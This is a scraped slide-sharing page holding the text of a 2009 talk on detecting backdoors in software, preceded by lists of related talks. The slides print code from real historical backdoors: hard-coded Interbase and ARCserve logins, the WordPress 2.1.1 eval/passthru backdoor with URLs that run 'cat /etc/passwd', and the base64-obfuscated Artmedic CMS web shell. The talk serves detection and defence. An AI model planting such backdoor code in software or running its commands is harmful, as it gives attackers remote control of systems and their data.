Workshop on BackTrack live CDamiable_indian
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry moreBHack Conference
 
Study notes for CompTIA Certified Advanced Security Practitioner
Study notes for CompTIA Certified Advanced Security PractitionerStudy notes for CompTIA Certified Advanced Security Practitioner
Study notes for CompTIA Certified Advanced Security PractitionerDavid Sweigert
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkDefCamp
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Security Weekly
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep diveTargeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep diveCisco DevNet
 
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013MattKilner
 
Comptia Security+ Exam Notes
Comptia Security+ Exam NotesComptia Security+ Exam Notes
Comptia Security+ Exam NotesVijayanand Yadla
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideDarin Fredde
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajaliwebhostingguy
 
Web Based Security
Web Based SecurityWeb Based Security
Web Based SecurityJohn Wiley
 

Ähnlich wie Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices (20)

Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application Backdoors
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptx
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
Study notes for CompTIA Certified Advanced Security Practitioner
Study notes for CompTIA Certified Advanced Security PractitionerStudy notes for CompTIA Certified Advanced Security Practitioner
Study notes for CompTIA Certified Advanced Security Practitioner
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep diveTargeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
 
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
 
Comptia Security+ Exam Notes
Comptia Security+ Exam NotesComptia Security+ Exam Notes
Comptia Security+ Exam Notes
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
 
Web Based Security
Web Based SecurityWeb Based Security
Web Based Security
 

Mehr von Tyler Shields

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile DeviceTyler Shields
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora PitfallTyler Shields
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Tyler Shields
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaTyler Shields
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...Tyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesTyler Shields
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsTyler Shields
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxSource Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxTyler Shields
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesTyler Shields
 
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesRaleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesTyler Shields
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareTyler Shields
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers ViewTyler Shields
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityOwasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityTyler Shields
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More ProblemsTyler Shields
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyTyler Shields
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerTyler Shields
 
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksIT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksTyler Shields
 

Mehr von Tyler Shields (20)

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile Device
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part DeuxSource Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part Deux
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
 
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the BerriesRaleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers View
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
 
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityOwasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More Problems
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
 
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone AttacksIT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
 

Kürzlich hochgeladen

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 

Kürzlich hochgeladen (20)

"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 

Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices

  • 1. Detecting "Certified Pre-owned" Software and Devices Tyler Shields October 15, 2009
  • 2. Contents Introduction to “Certified Pre-0wned” Backdoor Mechanisms (characteristics, examples, detection) – Special Credentials – Hidden Functionality – Unintended Network Activity Detection of Malicious Code Indicators – Rootkit like behaviors – Anti-debugging techniques – Time bombs Conclusion / Questions © 2009 Veracode, Inc. 2
  • 4. Certified “Pre-0wned” Software or hardware that comes with malicious behavior right out of the box. http://attrition.org/errata/cpo/ has a historical listing. Some examples: – Samsung digital photo frame infected with Sality Worm – Asus Eee Box's 80GB Hard Drive infected with W32/Taterf worm – Walmart Promo CD included custom spyware – Sony BMG CDs included XCP rootkit – Borland Interbase backdoor password © 2009 Veracode, Inc. 4
  • 5. Types of Backdoors System backdoors – Malware written to compromise a system (i.e. the application itself is the backdoor) – Sometimes relies on social engineering for initial execution Crypto backdoors – Designed weakness in an algorithm to allow those who know the weakness to decrypt with far less work than brute force. © 2009 Veracode, Inc. 5
  • 6. Types of Backdoors Application backdoors – the focus of this talk – Modifications to legitimate programs designed to bypass security mechanisms (i.e. applications that would already be running) – Often inserted by those who have legitimate access to source code or distribution binaries – Can result in system compromise as well – Not specific to any particular programming language © 2009 Veracode, Inc. 6
  • 7. Attacker Motivation Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so can bypass AV Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection by IDS For high value targets such as financial services and government it becomes cost effective and more reliable. – Report of the Defense Science Board Task Force, “Mission Impact of Foreign Influence on DoD Software”: – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation. © 2009 Veracode, Inc. 7
  • 8. Current State of Detection Application backdoors best detected by inspecting the source or binary code of the program Application backdoor scanning is imperfect – Impossible to programmatically determine the intent of application logic Backdoors in source may be detected quickly but backdoors in binaries often take years to surface – Linux backdoor attempt vs. Borland Interbase Most security code reviews focus on finding vulnerabilities with little emphasis on backdoors This talk focuses solely on static detection methods © 2009 Veracode, Inc. 8
  • 10. Characteristics Special credentials, usually hard-coded, which circumvent security checks – Usernames – Passwords – Secret hash or key The Keymaker from “The Matrix Reloaded” He is able to make keys that get him into secret areas of the Matrix. © 2009 Veracode, Inc. 10
  • 11. Borland Interbase 4.0, 5.0, 6.0 (2001) Database software used to house large quantities of data for fortune 500 companies, educational institutions, etc. Hard-coded username “politically” with the password “correct” allowed remote access Credentials inserted into the database at startup Support for user-defined functions equates to administrative access on the server Undetected for over seven years Opening the source revealed the backdoor © 2009 Veracode, Inc. 11
  • 12. Borland Interbase (cont’d) dpb = dpb_string; *dpb++ = gds__dpb_version1; *dpb++ = gds__dpb_user_name; *dpb++ = strlen (LOCKSMITH_USER); q = LOCKSMITH_USER; // Previously #defined to be “politically” while (*q) *dpb++ = *q++; *dpb++ = gds__dpb_password_enc; strcpy (password_enc, (char *)ENC_crypt (LOCKSMITH_PASSWORD, PASSWORD_SALT)); // #defined LOCKSMITH_PASSWORD to “correct” q = password_enc + 2; *dpb++ = strlen (q); while (*q) *dpb++ = *q++; dpb_length = dpb - dpb_string; isc_attach_database (status_vector, 0, GDS_VAL(name), &DB, dpb_length, dpb_string); © 2009 Veracode, Inc. 12
  • 13. Intel NetStructure 7110 SSL Accelerator (2000) Administrator password overridden by an undocumented shell password known as “wizard” mode Shell password derived from MAC address of primary Ethernet interface Results in root privileges on the appliance © 2009 Veracode, Inc. 13
  • 14. Cisco WLSE and HSE Software (2004) Default username and password in all releases up to that date of… – Wireless LAN Solution Engine (WLSE) – Hosting Solution Engine (HSE) Gives full access to device with complete control Username can not be disabled Upgrade to new version with default login and password removed © 2009 Veracode, Inc. 14
  • 15. BrightStor ARCserve Backup UniversalAgent Backdoor (2005) Backup and restore agent created by Computer Associates Hard coded credentials in the client side agent (wide deployment) Username: x02rootx03 Password: x02<%j8U]`~+Rix03 Read access to the remote file system © 2009 Veracode, Inc. 15
  • 16. EMC DiskXtender Hard Coded Password (2008) Used to manage storing of large quantities of data across multiple storage devices Software creates RPC endpoints in the installation that can be accessed remotely Endpoints contain hardcoded login and password information that allow full remote code execution Full compromise of installed host © 2009 Veracode, Inc. 16
  • 17. Detection Identify static variables that look like usernames or passwords – Start with all static strings using the ASCII character set – Focus on string comparisons as opposed to assignments or placeholders – Also inspect known crypto API calls where these strings are passed in as plaintext data Identify static variables that look like hashes – Start with all static strings using the character set [0-9A-Fa-f] – Narrow down to strings that correspond to lengths of known hash algorithms such as MD5 (128 bits) or SHA1 (160 bits) – Focus on string comparisons as opposed to assignments or placeholders – Examine cross-references to these strings © 2009 Veracode, Inc. 17
  • 18. Detection (cont’d) Identify static variables that look like cryptographic keys – Start with all static character arrays declared or dynamically allocated to a valid key length – Also identify static character arrays that are a multiple of a valid key length, which could be a key table – Narrow down to known crypto API calls where these arrays are passed in as the key parameter, for example: OpenSSL: DES_set_key(const_DES_cblock *key, DES_key_schedule *schedule) BSAFE: B_SetKeyInfo(B_KEY_OBJ keyObject, B_INFO_TYPE infoType, POINTER info ) – Perform a statistical test for randomness on static variables Data exhibiting high entropy is likely encrypted data and should be inspected further © 2009 Veracode, Inc. 18
  • 20. Characteristics Invisible parameters in web applications – not to be confused with hidden form fields Undocumented commands Leftover debug code – e.g. WIZ command in early sendmail – char *wiz = NULL May be combined with “special” IP addresses Number Six, a Cylon Agent, from Battlestar Galactica In exchange for access to government mainframes she helps design the navigation program subsequently used by Colonial warships, covertly creating backdoors in the program. © 2009 Veracode, Inc. 20
  • 21. WordPress 2.1.1 (2007) One of two WordPress download servers compromised Two PHP files modified to allow remote command injection Detected within one week http://wordpressurl/wp-includes/feed.php?ix=phpinfo(); http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd function comment_text_phpfilter($filterdata) { eval($filterdata); } ... if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); } function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); } © 2009 Veracode, Inc. 21
  • 22. Artmedic CMS 3.4 (2007) Multiple source files altered to allow remote command injection or arbitrary PHP includes Attempt at obfuscation Detected within two weeks $print = 'aWYoJF9HRVRbJ2luY2x1ZGUnXSkgaW5jbHVkZSgkX0dFVFsnaW5jbHVkZSddKTsNCmlmKCRfR0V UWydjbWQnXSkgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsNCmlmKCRfR0VUWydwaHAnXSkgZXZhbCg kX0dFVFsncGhwJ10pOw=='; eval(base64_decode($print)); which decodes to: if($_GET['include']) include($_GET['include']); if($_GET['cmd']) passthru($_GET['cmd']); if($_GET['php']) eval($_GET['php']); © 2009 Veracode, Inc. 22
  • 23. Quake Server (1998) RCON command on Quake server allows administrators to remotely send commands to the Quake console with a password Bypass authentication using hard-coded password “tms” Packet source address in the 192.246.40.x subnet Affected Quake 1, QuakeWorld, and Quake 2 Win32/Linux/Solaris © 2009 Veracode, Inc. 23
  • 24. Detection Recognize common patterns in scripting languages, e.g.: – Create an obfuscated string – Input into deobfuscation function (commonly Base64) – Call eval() on the result of the deobfuscation – Payload code allows command execution, auth bypass, etc. http://www.google.com/codesearch?hl=en&lr=&q=eval%5C%28base64_decode+file %3A%5C.php%24&btnG=Search Identify GET or POST parameters parsed by web applications – Compare to form fields in HTML, JSP, etc. pages to find fields that only appear on the server side © 2009 Veracode, Inc. 24
  • 25. Detection (cont’d) Identify potential OS command injection vectors – In C, calls to the exec() family, system(), popen(), etc. – In PHP, standard code review techniques such as looking for popen(), system(), exec(), shell_exec(), passthru(), eval(), backticks, etc. Also, calls to fopen(), include() or require() – Analyze data flow to check for tainted parameters Identify static variables that look like application commands – Start with all static strings using the ASCII character set (depending on the protocol, hidden commands might not be human-readable text) – Focus on string comparisons as opposed to assignments or placeholders – Check the main command processing loop(s) to see if it uses direct comparisons or reads from a data structure containing valid commands © 2009 Veracode, Inc. 25
